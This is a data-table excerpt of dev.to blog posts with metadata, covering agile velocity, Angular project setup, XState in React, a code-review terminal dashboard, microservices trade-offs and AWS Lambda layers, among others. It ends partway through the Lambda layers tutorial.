id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
667,630 | Increasing Velocity the Right Way and the Wrong Way | We love agile development at Foci Solutions. One of our main offerings is to coach clients on how to... | 0 | 2023-02-23T19:37:57 | https://dev.to/focisolutions/increasing-velocity-the-right-way-and-the-wrong-way-532h | agile, productivity | We love agile development at Foci Solutions. One of our main offerings is to coach clients on how to use agile to deliver quality products to their customers. Along this journey we often get asked the question "How do we increase velocity?" This question is complex and oftentimes misunderstood.
Velocity is a metric that is critically important, and yet can be fairly arbitrary. What I mean by that is that velocity is used to drive priority decisions, estimate the time a feature will take, and measure the business value a team is delivering. At the same time, velocity is different for every team, has uncertainty built into it, and can take multiple sprints to even become useful.
It's critical, then, to understand what velocity is and to be aware of how velocity can move. [scrum.org](https://www.scrum.org/resources/blog/agile-metrics-velocity#:~:text=Velocity%20is%20an%20indication%20of,Velocity%20or%20a%20Bad%20Velocity.) describes velocity as:
>an indication of the average amount of Product Backlog turned into an Increment of product during a Sprint by a Scrum Team, tracked by the Development Team for use within the Scrum Team. There is no such thing as a Good Velocity or a Bad Velocity. Remember, it is based on relative estimations
What this means is that velocity is a number used by the development team to track how much value they are delivering to the client. What is important to take from this is that it's tracked by the development team, for the scrum team. This means that the development team has sole responsibility for how the velocity moves inside the team.
As a manager or product owner, if you only care about raising velocity at any and all costs, developers will achieve this in the following ways:
1. Developers can begin to sandbag estimates during backlog grooming. What used to be a 2 point story is now an 8 point story.
2. Developers start to cut corners. Maybe their unit tests aren't as robust, their error handling doesn't handle as many errors, or they don't consider edge cases as much.
3. Developers start to work longer hours, take fewer breaks, and eventually burn out.
All of these scenarios cause a bump in velocity; however, the outcomes of these scenarios are often disastrous. By sandbagging estimates, developers stop feeling like their input matters, and no extra value is actually delivered with the increased velocity, which makes the metric significantly less useful. If developers begin to cut corners, it becomes hard to know when software is ready, the bug rate rises, technical debt grows, and software becomes more expensive to deliver. Worst of all, if developers start to work longer hours, the velocity bump is truly temporary. Velocity will drop as developers lose passion for the code they develop and the work slowly takes a toll on their mental state. This continues until, inevitably, the developer crashes and decides to look beyond the company and change jobs.
So how do we responsibly increase velocity without incurring negative side effects? We can find a great example of this inside UPS. An optimization occurred at UPS where they recalculated all of their trucks' routes to eliminate as many [left hand turns](https://www.cnn.com/2017/02/16/world/ups-trucks-no-left-turns) as possible. The effects of this decision were staggering. It's estimated that this decision saved UPS over 100 million gallons of fuel every year. This kind of decision is the true way to increase velocity: by looking into the way we deliver value and doing it differently. We need to find things that can be done to increase velocity and at the same time increase value to customers, now and forever. We can do this:
* Through automation
* Through process optimization
* Through planning
* Through collaboration
We can spend some velocity now to increase velocity tomorrow by working to automate the tasks developers are doing on a regular basis. Add more automation to CI/CD pipelines so developers can spend less time completing pull requests. Look to automate complex deployments so that a developer doesn't need to do them by hand. Automate complicated testing plans so that a QA team can spend their time elsewhere.
Look to the process and find ways to reduce the process burden on people's time. This is going to vary widely based on the process you and your team have; however, burdensome processes like Change Review Boards, approval gates, and long drawn-out testing phases are often good places to look. This doesn't mean you need to make deployments riskier, but your team may need to introduce different tools, look to automation, or think outside the box to make the process less restrictive in delivering value.
Agile software development is often tied to doing now and thinking as we go. Taking time to come up with a solid short-term plan can help in finding blockers earlier and in ensuring that the team is on the same page.
Everyone needs to come to the table and be willing to change how they work today in order to find velocity. Product Owners, QA, managers, and even executives should be available for these discussions. Collaboration is critical to finding the largest velocity gains.
I'm sure there are other areas in your company where velocity can be found as well. Just ensure that the change is long-lasting and real. Make sure you are gaining velocity the right way.
| blastdan |
667,972 | Did you mean: | Ever seen a message like that on google? Works more or less ok when you have a search query misprint... | 21,821 | 2021-04-16T11:00:20 | https://dev.to/sergeyie/did-you-mean-44in | Ever seen a message like that on Google? It works more or less OK when you have a misprint in your search query or something, but it really crushes the experience for brand content. Like "Did you mean:", actually no, I didn't!
Rather often, when searching for small companies, brands, or products, Google adds its "Did you mean:" with several other options. That is really annoying for webmasters who try to build a beautiful UX and [SO](https://ieffe.art.blog/2021/09/19/so/) to get as many leads as possible.
Ever wanted to remove such a message? Me, all the time. Or at least to update its primitive yet catchy design. It seems the only way to do that is to convince Google that users aren't mistaken and that this is really what they search for and need. For that, a brand/query needs a bigger amount of search traffic. Usually webmasters don't have that option; the number of searches just isn't enough. Nothing else to do then; there's no real alternative.
One idea is to try to optimize content for the keywords that "Did you mean:" offers. At least the search results page will then have a more logical structure, one that includes branded content, with some titles, descriptions, etc. for the words Google suggests. Hopefully this "Did you mean:" message will then soon stop being shown. | sergeyie | |
668,247 | Understanding some features better before creating your first Angular project | #angular #typescript Hi everyone, how are you? I'm a programming student, currently doing... | 0 | 2021-04-16T19:36:13 | https://dev.to/fegoncalves/entendendo-melhor-algumas-funcionalidades-antes-de-criar-seu-primeiro-projeto-em-angular-32d6 |
[`#angular`](https://dev.to/t/angular) [`#typescript`](https://dev.to/t/typescript)
Hi everyone, how are you?
I'm a programming student, currently doing the _Avanade Angular Developer Bootcamp at Digital Innovation One_, and I've come to share some information that actually started as questions I had while creating my first Angular project (which is still in progress). I'm a very curious and detail-oriented person, and after understanding these features better, I wanted to share them with you, because these questions of mine may already have been, or may someday become, yours too :question: :speech_balloon: :smiley:.
### 1. FIRST STEPS:
##### Install Node
[nodejs.org](https://nodejs.org/en/download/)
##### Install the npm package manager
```CMD
npm install -g npm
```
##### Install the Angular CLI
```CMD
npm install -g @angular/cli
```
I won't go into much detail here, but these installations are stored on your system, not in the project, so they only need to be done once. If you already have them installed, just check that the versions are up to date:
##### Node version
```CMD
node -v
```
##### Package manager
```CMD
npm -v
```
##### Angular CLI
```CMD
ng version
```
---
### 2. CREATING A NEW PROJECT
To create a new project we use the command line:
```CMD
ng new nomedoprojeto
```
And from here on is where I started looking for information to understand these options a little better:
#### STRICT MODE
As soon as I typed the command line above, I received the following message:
```CMD
C:\Fer\Projetos\Angular> ng new nomedoprojeto
? Do you want to enforce stricter type checking and stricter bundle budgets in the workspace?
This setting helps improve maintainability and catch bugs ahead of time.
For more information, see https://angular.io/strict (y/N)
```
The question it asks is: _whether I want to enforce stricter type checking and stricter bundle budgets, and it says this is a setting that helps with maintainability and catching bugs ahead of time_.
**_But what exactly does that mean?_**
This question has to do with how Angular uses TypeScript. Researching _strict mode_ a little, I learned that it is one of the additional tools Angular provides. Once this mode is enabled, a new workspace is initialized with a configuration whose purpose is to analyze your code.
This flag turns on several options for the TypeScript compiler. Here are a few of them: `strictTemplates`, `strictInjectionParameters`, `noImplicitAny`, `noImplicitThis`, among others.
When your code is checked, you will receive error messages, perhaps saying an initialization should be done differently or something needs to be added, things like that, but all of these messages are adjustments recommended by the TypeScript team itself. I found this fantastic, and at the end of the day this mode is about the safety of your project, making your code simpler to read and less likely to fail.
This mode is not enabled by default, so if the question covered in this topic doesn't appear for you, it can be enabled manually using the `--strict` flag.
Well, all of this is veeeery new to me and there are still many steps before I get there, but when I do, I'll already know what strict mode is about. As I gain a bit more knowledge, I want to use it, because at first sight I liked it :grin:, and if I understood its purpose correctly, this mode brings safety not only to the project itself, but also to the developer.
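For illustration only (the exact file and option layout can vary between Angular versions), the flags mentioned above end up in the workspace's `tsconfig.json`, roughly like this:
```json
{
  "compilerOptions": {
    "strict": true,
    "noImplicitAny": true,
    "noImplicitThis": true
  },
  "angularCompilerOptions": {
    "strictTemplates": true,
    "strictInjectionParameters": true
  }
}
```
Answering `y` to the prompt (or running `ng new` with `--strict`) generates a configuration along these lines, so you can also tighten or relax individual flags later by editing this file.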
#### ROUTES AND STYLES
After your choice about strict mode, it asks whether you want to add routing.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto>
? Would you like to add Angular routing? (y/N)
```
Routes are simply the other pages that will exist in your project. A very basic example: if your application is about electronic products, you'll need to create routes that direct users to those other pages (which will be the components you create) for products, quotes, contact, and so on.
To use it, just type `y` and a routing file (module) will be added to your application.
Right after that, you'll need to choose which stylesheet format you want to use; just navigate with the up and down arrows and, once your preference is selected, press enter to confirm.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto>
? Which stylesheet format would you like to use? (Use arrow keys)
> CSS
SCSS [ https://sass-lang.com/documentation/syntax#scss ]
Sass [ https://sass-lang.com/documentation/syntax#the-indented-syntax ]
Less [ http://lesscss.org ]
Stylus [ https://stylus-lang.com ]
```
---
### 3. INSTALLING ANGULAR MATERIAL
Angular Material is a library of components based on Google's Material Design (e.g. buttons, menus, etc.), so you don't need to build your content from scratch; just use these components.
To install it, type the command line
```CMD
ng add @angular/material
```
#### THEME
First it asks you to choose the theme color you want to use. Just move up or down with the arrow keys to make your choice and then press enter. It can be customized later through the `angular.json/styles` file.
```CMD
C:\Fer\Projetos\Angular\nomedoprojeto> ng add @angular/material
Installing packages for tooling via npm.
Installed packages for tooling via npm.
? Choose a prebuilt theme name, or "custom" for a custom theme: (Use arrow keys)
> Indigo/Pink [ Preview: https://material.angular.io?theme=indigo-pink ]
Deep Purple/Amber [ Preview: https://material.angular.io?theme=deeppurple-amber ]
Pink/Blue Grey [ Preview: https://material.angular.io?theme=pink-bluegrey ]
Purple/Green [ Preview: https://material.angular.io?theme=purple-green ]
Custom
```
#### TYPOGRAPHY
Right after that, you need to choose whether the typography will be global, i.e., once confirmed, the _Roboto_ font becomes the application's default font.
If you enable this option, you can see in the index.html file that a link will be added in the head and a class on the body, as the documentation itself describes, along with the style changes; however, nothing stops you from switching to another font later.
```CMD
? Set up global Angular Material typography styles? (y/N)
```
#### ANIMATIONS
These are the Angular Material animations. When using Angular Material components, it's important to accept the animations so that everything works normally.
```CMD
? Set up browser animations for Angular Material? (Y/n)
```
Once you've answered all these options, the installation will start, and you can then view your application in the browser with the command line:
```CMD
ng serve
```
Well, that's it, folks... I hope these clarifications can help you in some way, and feel free to leave a comment.
I would also love to read comments and guidance from more experienced folks, since I'm just starting out in programming as well as in Angular; all feedback and help will be welcome :blush::heart:
---
##### Some references used:
###### Node
[https://nodejs.org/en/](https://nodejs.org/en/)
###### Angular CLI
[https://angular.io/cli](https://angular.io/cli)
###### Strict Mode
[https://angular.io/guide/strict-mode](https://angular.io/guide/strict-mode)
[https://indepth.dev/posts/1402/bulletproof-angular](https://indepth.dev/posts/1402/bulletproof-angular)
[https://dev.to/briwa/how-strict-is-typescript-s-strict-mode-311a](https://dev.to/briwa/how-strict-is-typescript-s-strict-mode-311a)
[https://www.youtube.com/watch?v=QkC1hjXx0dU](https://www.youtube.com/watch?v=QkC1hjXx0dU)
###### Routes
[https://www.youtube.com/watch?v=8OHoAZ6j0Rg](https://www.youtube.com/watch?v=8OHoAZ6j0Rg)
[https://balta.io/blog/angular-rotas-guardas-navegacao](https://balta.io/blog/angular-rotas-guardas-navegacao#:~:text=O%20Angular%20nos%20fornece%20um,vou%20te%20mostrar%20neste%20artigo)
###### Angular Material
[https://material.angular.io/guide/getting-started](https://material.angular.io/guide/getting-started)
[https://www.youtube.com/watch?v=5-bkwiycFik](https://www.youtube.com/watch?v=5-bkwiycFik)
###### Angular Material - Components and CDK
[https://material.angular.io/components/categories](https://material.angular.io/components/categories)
[https://material.io/components](https://material.io/components)
[https://material.angular.io/cdk/categories](https://material.angular.io/cdk/categories)
###### Angular Material - Typography
[https://material.angular.io/guide/typography](https://material.angular.io/guide/typography)
| fegoncalves | |
668,304 | A simple terminal UI dashboard for code review | Reviews is a simple code review manager that lists the status of open pull requests across multiple o... | 0 | 2021-04-16T16:19:04 | https://dev.to/apoclyps/a-simple-terminal-ui-dashboard-for-code-review-2g76 | python, terminal, github, codereview | Reviews is a simple code review manager that lists the status of open pull requests across multiple organizations & repositories as a terminal UI dashboard.

The project was created as a way to keep on top of multiple teams creating large amounts of pull requests across several repositories by having a single up-to-date view of the pull request's approval status and age.
The initial implementation can be found on GitHub at https://github.com/apoclyps/code-review-manager and it can be installed from PyPI: https://pypi.org/project/reviews/
Contributions and feedback are welcome. It's in the very early stages of development and it has a long way to go, but hopefully there is enough here for others to derive some value from it being released early.
### Getting started with reviews
You can immediately start using Reviews by installing it from PyPI and providing the following configuration before running it.
```bash
pip install reviews
export REPOSITORY_CONFIGURATION="apoclyps/code-review-manager,apoclyps/my-dev-space"
export GITHUB_TOKEN="your-token"
reviews dashboard
``` | apoclyps |
668,810 | Day 347 : Times is Rough | liner notes: Professional : Had a really good day to head into the weekend. Had a team meeting to s... | 0 | 2021-04-16T21:19:45 | https://dev.to/dwane/day-347-times-is-rough-29np | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Had a really good day to head into the weekend. Had a team meeting to see what folks worked on during the week and if anyone needed anything. Then had a really good catch up meeting with some team members. Had a lot of laughs. Spent the rest of the day getting my new blog post submitted into the Content Management System. Got my stuff done and called it a day a couple of hours early.
- Personal : Last night, I went through a bunch of tracks for the radio show. After that, I watched an episode of "Dr. Stone". Did a little thinking about how the layout will be for my new side project. Want to keep it as simple as possible.

Started working on tomorrow's radio show right after work. Got a lot of it done. Just a few more things. When that's done, I'll probably watch "Falcon and Winter Soldier". Maybe do a rough sketch of the layout for the new project. Then maybe watch an episode of "Dr. Stone". If it's not too late, maybe I'll set up a starter project. Been watching the news, whew, times is rough and people are insane!
Have a great night and weekend!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube 7KErLvd8QSc %} | dwane |
668,836 | khaliljaan99 | I love my picture, please friends, share this photo with your friends. | 0 | 2021-04-16T22:34:36 | https://dev.to/khaliljaan99/khaliljaan99-24pl | khaliljaan99 | I love my picture, please friends, share this photo with your friends. | khaliljaan99 |
669,583 | New to web development / working in the tech sector? | This blog post is the first one of a series of posts that are aimed at all the aspiring web developer... | 0 | 2021-04-17T18:13:13 | https://dev.to/omarsharifgr/new-to-web-development-working-in-the-tech-sector-gg7 | news, performance, achievements, success | This blog post is the first one of a series of posts that are aimed at all the aspiring web developers out there and those who - like me - want to take a step back and provide some well-needed advice to their past selves. For this particular post, this advice takes the form of outlining something that I learned this week as part of an amazing course that I am completing with an equally amazing organisation - Code Your Future.
Simply put, my first (of many) main pieces of advice to anyone starting out or entering the world of tech and web development is this: use social media as a platform where you can reach out to the huge number of companies and recruiters looking for people like you. Examples of some social media channels and collaboration platforms that can be useful for this are:
- Twitter
- LinkedIn
- Slack
- Instagram
- DEV.to
- GitHub
The main way to utilise social media is to build and develop your very own personal brand and profile, or (with platforms such as GitHub) to demonstrate your capabilities. Whatever you do, make it something that reflects you and allows you to stand out. An example of some features that can be added to a LinkedIn account are:
- A detailed intro that outlines what you want an employer to know:

- A detailed 'About' section that provides links to previous projects, outlines achievements and showcases YOU to the best of your ability:

Quick tip - contacting the right people is essential. Don't be scared to jump out of your comfort zone and contact employees within a company that you want to join, or simply to connect and learn from their experiences.
Look out for my next post…..
| omarsharifgr |
689,338 | How I can send emails with the formatting I've done in google sheet by using app script? | Hi everyone. I'm trying to send emails with google app script by running following code in script edi... | 0 | 2021-05-06T05:23:50 | https://dev.to/ahmad786987/how-i-can-send-emails-with-the-formatting-i-ve-done-in-google-sheet-by-using-app-script-2o8j | Hi everyone. I'm trying to send emails with Google Apps Script by running the following code in the script editor:
```javascript
// This constant is written in column C for rows for which an email
// has been sent successfully.
var EMAIL_SENT = 'EMAIL_SENT';

/**
 * Sends non-duplicate emails with data from the current spreadsheet.
 */
function sendEmails2() {
  var sheet = SpreadsheetApp.getActiveSheet();
  var startRow = 2; // First row of data to process
  var numRows = 2;  // Number of rows to process
  // Fetch the range of cells A2:C3
  var dataRange = sheet.getRange(startRow, 1, numRows, 3);
  // Fetch values for each row in the Range.
  var data = dataRange.getValues();
  for (var i = 0; i < data.length; ++i) {
    var row = data[i];
    var emailAddress = row[0]; // First column
    var message = row[1];      // Second column
    var emailSent = row[2];    // Third column
    if (emailSent !== EMAIL_SENT) { // Prevents sending duplicates
      var subject = 'Sending emails from a Spreadsheet';
      MailApp.sendEmail(emailAddress, subject, message);
      sheet.getRange(startRow + i, 3).setValue(EMAIL_SENT);
      // Make sure the cell is updated right away in case the script is interrupted
      SpreadsheetApp.flush();
    }
  }
}
```
The problem I'm facing with this code is that it doesn't preserve the bullet points and anchor text I've formatted in my Google Sheet. I'd appreciate any help with solving this problem.
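One common workaround, sketched below under the assumption that the formatting can be expressed as HTML, is to build an HTML version of the message and pass it through the `htmlBody` option of `MailApp.sendEmail`, since `getValues()` only returns plain strings and drops any rich-text formatting. The `toHtmlList` helper and `sendFormattedEmail` wrapper here are hypothetical names for illustration; only the `htmlBody` option itself is part of the MailApp API.

```javascript
// Hypothetical helper: turn an array of lines into an HTML bullet list,
// so bullet formatting survives in the email body.
function toHtmlList(items) {
  var listItems = items.map(function (item) {
    return '<li>' + item + '</li>';
  });
  return '<ul>' + listItems.join('') + '</ul>';
}

// Sketch of sending the formatted version (not invoked here; MailApp only
// exists inside the Apps Script runtime). The plain-text message is kept
// as a fallback for clients that don't render HTML.
function sendFormattedEmail(emailAddress, subject, plainMessage, bulletLines) {
  MailApp.sendEmail(emailAddress, subject, plainMessage, {
    htmlBody: toHtmlList(bulletLines)
  });
}
```

Anchor text works the same way: put an `<a href="...">` tag in the HTML string. Recovering the formatting automatically from the sheet would need the rich-text APIs rather than `getValues()`.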
Have a good day! | ahmad786987 | |
692,324 | Use an XState Machine with React | XState gives you the tools to take control over the state of your UI. When you've got it under contro... | 0 | 2021-05-08T22:21:21 | https://dev.to/jbranchaud/use-an-xstate-machine-with-react-326i | react, xstate, javascript, ux | XState gives you the tools to take control over the state of your UI. When you've got it under control, you can build interfaces that provide a predictable and delightful user experience.
Let's look at how to integrate XState into a React app.
There are a bunch of well-constructed XState machines available to directly copy into your project from [XState Catalogue](https://xstate-catalogue.com/). For instance, I can interact with and then grab the [Confirmation Dialog machine](https://xstate-catalogue.com/machines/confirmation-dialog) with the 'Copy' button.

I'll then paste that machine definition into something like `confirmMachine.js`. XState is framework agnostic, so there is nothing about this machine, on its own, that has anything to do with React or Vue or Svelte or whatever. I do want to use this within a React app, so I then need to grab [`@xstate/react`](https://xstate.js.org/docs/packages/xstate-react/). XState's React "bindings" come with a `useMachine` hook.
## An Example
Here is what that will look like.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
{/* other props ... */}
/>
{/* other stuff */}
</div>
)
}
```
The `useMachine` call both interprets and starts up the machine service. This hook gives you two values as an array. The `current` value is everything about the _current_ state of the machine. The `send` is a function for dispatching transitions between machine states.
## The Current State of the Machine
With `current` I can figure out the _current_ state of the machine to determine whether or not I should be showing the dialog. `current.value` will tell me what state the machine is in.
I can also get access to any error message that comes from the machine.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
const showDialog = current.value !== "closed";
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
showDialog={showDialog}
errorMessage={current.context.errorMessage}
/>
{/* other stuff */}
</div>
)
}
```
Notice I check `current.value !== "closed"` to determine whether or not the dialog should be showing.
## Moving Between States with Send
I can now incorporate the `send` function into some handlers so that users can interact with the dialog. I'll create a handler for opening, closing, and confirming the dialog.
```javascript
import * as React from "react";
import { useMachine } from "@xstate/react";
import confirmMachine from "./confirmMachine";
import Dialog from "./dialog";
export default function App() {
const [current, send] = useMachine(confirmMachine);
const deleteAction = () => { /* ... */ };
const showDialog = current.value !== "closed";
const open = () => {
send({ type: "OPEN_DIALOG", action: deleteAction });
};
const close = () => {
send("CANCEL");
};
const confirm = () => {
send("CONFIRM");
};
return (
<div className="App">
<Dialog
message="Are you sure you want to delete something?"
handleConfirm={confirm}
handleClose={close}
showDialog={showDialog}
errorMessage={current.context.errorMessage}
/>
{/* other stuff */}
<button onClick={open}>Delete Something</button>
</div>
)
}
```
The `open` handler when called will transition the machine to `open.idle` using the `OPEN_DIALOG` event. It also includes an `action` which will be called if the dialog is _confirmed_. When triggered, this will cause the `showDialog` value to evaluate to true. This handler is wired up to some element outside of the dialog, in this case a button.
The `close` handler is passed to the dialog. When called this sends the `CANCEL` event to the machine. That will transition the machine back into the `closed` state. This change will cause the `showDialog` value to evaluate back to false. Any user action that should dismiss the dialog will trigger this handler.
Once the dialog is open, the user can _confirm_ the dialog's prompt by clicking a 'Confirm' button. This will call the `confirm` handler which will send the `CONFIRM` event to the machine. When the machine receives this event it will trigger the `action` given on `OPEN_DIALOG`.
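To make the flow described above concrete without pulling in the XState runtime, here is a minimal plain-JavaScript sketch of the dialog's transition table. The `closed` and `open.idle` states and the `OPEN_DIALOG`/`CANCEL`/`CONFIRM` events come straight from the discussion above; the `open.executing` state and its `SUCCESS`/`ERROR` events are my guess at how the catalogue machine handles the promise, so treat those as assumptions rather than the real machine definition.

```javascript
// Transition table: state -> event -> next state.
// closed / open.idle mirror the article; open.executing and its
// SUCCESS / ERROR events are assumed, not copied from the real machine.
const transitions = {
  closed: { OPEN_DIALOG: "open.idle" },
  "open.idle": { CANCEL: "closed", CONFIRM: "open.executing" },
  "open.executing": { SUCCESS: "closed", ERROR: "open.idle" },
};

// Pure transition function: unknown events leave the state unchanged,
// the same "ignore irrelevant events" behavior a statechart gives you.
function transition(state, event) {
  const next = transitions[state] && transitions[state][event];
  return next || state;
}
```

This is essentially what `send` does for you: `transition("closed", "OPEN_DIALOG")` yields `"open.idle"`, while `transition("closed", "CONFIRM")` stays `"closed"`, because a closed dialog can't be confirmed.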
## Wrapping Up
There are more details to this specific machine. Depending on whether the action's promise resolves or rejects, the machine will take a different course of action. That's an exercise for the reader or the subject of another post.
At this point, we have explored enough of XState in a React context that you can start using the two together. If you'd like you can start by interacting with and remixing [the codesandbox example I used for this post](https://codesandbox.io/s/happy-ellis-e9j6s?file=/src/App.tsx).
There are a lot of moving parts when getting started with XState, so if you have questions about what was covered here, feel free to drop me a note on [twitter](https://twitter.com/jbrancha).
_If you enjoy my writing, consider [joining my newsletter](https://crafty-builder-6996.ck.page/e169c61186)._
---
<em>Cover photo by <a href="https://unsplash.com/@ballparkbrand?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Ball Park Brand</a> on <a href="https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Unsplash</a></em> | jbranchaud |
692,895 | Yes! Use microservices and ask 'why are you like this?' afterward 😑 | TL;DR It's a good idea to use microservices for a team of three or four people that only handles one... | 0 | 2021-05-09T16:51:49 | https://gdi3d.github.io/using-microservices-experience-2021-05-09/ | microservices, codenewbie, management | > TL;DR It's a good idea to use microservices for a team of three or four people that only handles one or two microservices. Otherwise, stay away!
# Falling in love with Microservices 🥰
I started using the microservice architecture in 2015, when I had to refactor a medium-size Django app into pieces. Since then I have been using microservices for both work and personal projects non-stop.
At first glance microservices are great, it looks like you get a lot of benefits and it makes you think harder about every component of your application.
> Microservices - also known as the microservice architecture - is an architectural style that structures an application as a collection of services that are:
> Highly maintainable and testable
> Loosely coupled
> Independently deployable
> Organized around business capabilities
> Owned by a small team
>
> source: [https://microservices.io/](https://microservices.io/)
I was very happy with having my multiple repos, big docker-compose.yml files, and multiple databases, stitching everything together, and watching my software work, or kind of. But that excitement went away when I had to keep everything working and up to date.
# When reality kicks in 😕
Now, after 6 years of experience, I've concluded that **microservices are not a good idea when you have a team of ten or fewer people and more than three or four microservices**.
In that scenario, your development cycle will suffer and things will become tedious and more time expensive.
The main issue is not the microservices architecture itself, but rather the amount of tooling, knowledge, and preparation the team needs to work properly.
In my experience, the team that I lead experienced the following issues when dealing with microservices:
- Upgrading frameworks versions was hard because we had to do it for every microservice, build, and deploy.
- We had a few libraries that were common for all microservices. Every time we discovered a bug or decided to change something, we had to apply that change to every microservice.
- Changes are part of the product life cycle, and sometimes those changes affected more than one microservice.
- Debugging was harder because the data flows through multiple applications.
- An individual database schema for every microservice, and restricted access to each, meant that multiple microservices had to be called to obtain a single dataset.
- Creating and maintaining a small dump of all databases for dev and QA purposes was HARD!
Today I prefer going with the traditional monolithic architecture, but making sure that my design will allow me to switch to microservices easily.
In conclusion, I'll (try to) go back to a monolith as a starting point and move to microservices only when the team is large enough for the number of microservices involved.
Another solution is to create microservices for a small part of the application that could benefit from it.
> Fun fact: Although I say this, I did use microservices on my recent side project. Maybe I'm hooked and need counseling 😂 | gdi3d |
692,979 | How to Share Code Between Lambda Functions | As I was getting into cloud development, and while still trying to figure out the best and fastest... | 0 | 2021-05-09T20:17:19 | https://medium.com/aws-in-plain-english/how-to-share-code-between-lambda-functions-49c656bd2ffc | ---
canonical_url: https://medium.com/aws-in-plain-english/how-to-share-code-between-lambda-functions-49c656bd2ffc
---
As I was getting into cloud development, and while still trying to figure out the best and fastest way to get my code tested and deployed, I learned about Lambda Layers.
Originally, the main satisfaction they provided was enabling me to see the Lambda code directly in the AWS Console: they moved the dependencies I was using out of the deployment package, which made my lambda code smaller, as it should be. This enabled me to debug and change my own lambda code from the console directly (don't do this in a prod environment, it's not a good practice) - later, I learned how to better debug and test my lambda locally with the help of [SAM](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/what-is-sam.html) and sometimes [Localstack](https://github.com/localstack/localstack).
That was a side effect of Lambda Layer usage, not their purpose. This post will go over a couple of benefits of using Layers as we build a lambda with a layer together.
The main goals of using layers are:
- Reducing the size of the Lambda deployment package, which makes the deployment faster
- Sharing code across multiple lambdas (e.g. packages, binaries, etc.)
For the sake of demonstrating these use cases, I will use a large JS library, [momentjs](https://momentjs.com/docs/), as a dependency in my lambda. (Note that the momentjs docs recommend avoiding it when possible: `We now generally consider Moment to be a legacy project in maintenance mode. It is not dead, but it is indeed done.`)
## Create Lambda Without Layers
Our lambda will simply take a date and format it (2021-05-09 => 09 May 2021)
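Just to make the target output concrete before pulling in moment, here is the same transformation sketched in dependency-free JavaScript (the `formatDate` helper is purely illustrative and not part of the tutorial's code):

```
// Illustration only: the same 2021-05-09 => 09 May 2021 transformation
// without moment, using a simple month-name lookup.
const MONTHS = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];

function formatDate(isoDate) {
  const [year, month, day] = isoDate.split('-').map(Number);
  return `${String(day).padStart(2, '0')} ${MONTHS[month - 1]} ${year}`;
}

console.log(formatDate('2021-05-09')); // 09 May 2021
```

In the tutorial itself we deliberately use moment instead, precisely because its size makes the layer benefits visible.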
- Run the following command to initialize the serverless application: `sam init` - of course, you would need to have the [SAM CLI installed](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html) on your machine. Once done, you will get prompted with a few questions. Choose NodeJS as a runtime, add a project name, and select the "Hello World" template.
- Update the template.yml to reflect the proper values - mainly changing the name from hello-world to date-formatter, deleting the "Events" property of the lambda as we are not looking to trigger it through API Gateway or other means (we'll trigger it manually), and deleting the Outputs as we're not going to need them. So the template.yml will look as follows:
```
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Description: date-formatter
Resources:
  DateFormatterFunction:
    Type: AWS::Serverless::Function
    Properties:
      CodeUri: src/
      Handler: app.lambdaHandler
      Runtime: nodejs12.x
      FunctionName: date-formatter
```
- In the generated folders and files, change the "hello-world" folder name to be "src" to match the CodeUri added in the template.yml.
- Inside the "src" folder, run `npm i moment`
- Update the app.js file as follows:
```
const moment = require('moment');

exports.lambdaHandler = async (event, context) => {
  try {
    const { date } = event;
    const formattedDate = moment(date).format('DD MMM YYYY');
    console.log(formattedDate);
  } catch (err) {
    console.log(err);
  }
};
```
* Deploy the app: `sam deploy --guided`. You will be prompted with a few questions
```
Setting default arguments for 'sam deploy'
=========================================
Stack Name [sam-app]: lambda-layer-demo
AWS Region [us-east-1]:
#Shows you resources changes to be deployed and require a 'Y' to initiate deploy
Confirm changes before deploy [y/N]:
#SAM needs permission to be able to create roles to connect to the resources in your template
Allow SAM CLI IAM role creation [Y/n]: Y
Save arguments to configuration file [Y/n]: Y
SAM configuration file [samconfig.toml]:
SAM configuration environment [default]:
```
* Open your console and test the lambda - you might have an information box under "Code source" showing "The deployment package of your Lambda function is too large to enable inline code editing. However, you can still invoke your function." - What is more important is the size of the lambda, which shows under "Code properties" - the **Package size shows 1.1 MB**. It also took 32 seconds to get that code uploaded and deployed on my fiber connection.
## Introduce a Layer to our Lambda
As per the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html#invocation-layers-cloudformation), a Lambda layer is a .zip file archive that can contain additional code or data. A layer can contain libraries, a custom runtime, data, or configuration files. Layers promote code sharing and separation of responsibilities so that you can iterate faster on writing business logic.
We will now bundle momentjs in a layer, and then we could use it within our Lambda:
- Create a new folder structure next to the project folder: `cd .. && mkdir -p ./layer/nodejs`
- In the layer/nodejs folder, run `npm init`, then `npm i moment` - this initializes the npm package and installs momentjs
- Back in the template.yml file, add the following resource:
```
  Momentlayer:
    Type: AWS::Serverless::LayerVersion
    Properties:
      LayerName: moment-layer-2-29-1
      Description: Moment layer 2.29.1
      ContentUri: ../layer
      CompatibleRuntimes:
        - nodejs12.x
```
* Run `sam deploy` to deploy the sam template and create the layer
* Once done, navigate to the AWS console, and look under "Layers" to find the newly created layer. Or simply, run `aws lambda list-layers` in your command line
That's awesome. Now, it's time to add the layer to our lambda.
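One easy-to-miss step: the function resource in template.yml has to reference the layer before the lambda can use it. Here is a sketch of the change; the `Layers` property points at the `Momentlayer` logical ID defined earlier:

```
  DateFormatterFunction:
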